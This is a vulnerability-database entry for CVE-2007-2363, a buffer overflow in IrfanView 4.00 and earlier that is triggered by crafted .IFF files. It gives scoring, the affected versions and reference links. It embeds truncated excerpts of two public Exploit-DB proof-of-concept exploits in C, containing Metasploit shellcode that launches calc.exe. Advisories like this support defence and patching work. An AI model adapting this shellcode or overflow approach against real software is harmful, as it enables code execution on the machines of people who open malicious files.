CVE-2007-2363
published 2007-04-30CVE-2007-2363: Buffer overflow in IrfanView 4.00 and earlier allows user-assisted remote attackers to execute arbitrary code via a crafted .IFF file.
PriorityP342high8.5CVSS 2.0
AVNACMAuSCCICAC
EXPLOIT
EPSS
8.94%
94.6th percentile
Buffer overflow in IrfanView 4.00 and earlier allows user-assisted remote attackers to execute arbitrary code via a crafted .IFF file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| irfanview | irfanview | <= 4.00 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IrfanView 3.99 - '.IFF' File Local Stack Buffer Overflow
exploitdb·2008-08-01
CVE-2007-2363 IrfanView 3.99 - '.IFF' File Local Stack Buffer Overflow
IrfanView 3.99 - '.IFF' File Local Stack Buffer Overflow
---
/*Irfan View 3.99 .IFF File Local Stack Buffer Overflow
This sploit runs calc.exe tested on Win XP Pro sp3;If
you run it on another vs of Win make sure you chance the
retaddress,but it works almost all the time so.. .
Credits for finding the bug and sploit go to fl0 fl0w.
Gretez to all romanian coderz :) !
Have a blast ! !
*/
#include
#include
#define SF "RO.iff"
#define OFFSET 2100
//shellcode from metasploit
char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x
Exploit-DB
IrfanView 4.00 - '.iff' Local Buffer Overflow
exploitdb·2007-04-27
CVE-2007-2363 IrfanView 4.00 - '.iff' Local Buffer Overflow
IrfanView 4.00 - '.iff' Local Buffer Overflow
---
/******************************************************************************
* *
* IrfanView *
******************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=138 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99"
"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04"
"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb"
"\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30"
"\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xe
No writeups or analysis indexed.
http://osvdb.org/35463http://secunia.com/advisories/25052http://www.securityfocus.com/bid/23692http://www.vupen.com/english/advisories/2007/1575https://exchange.xforce.ibmcloud.com/vulnerabilities/33946https://www.exploit-db.com/exploits/3811http://osvdb.org/35463http://secunia.com/advisories/25052http://www.securityfocus.com/bid/23692http://www.vupen.com/english/advisories/2007/1575https://exchange.xforce.ibmcloud.com/vulnerabilities/33946https://www.exploit-db.com/exploits/3811
2007-04-30
Published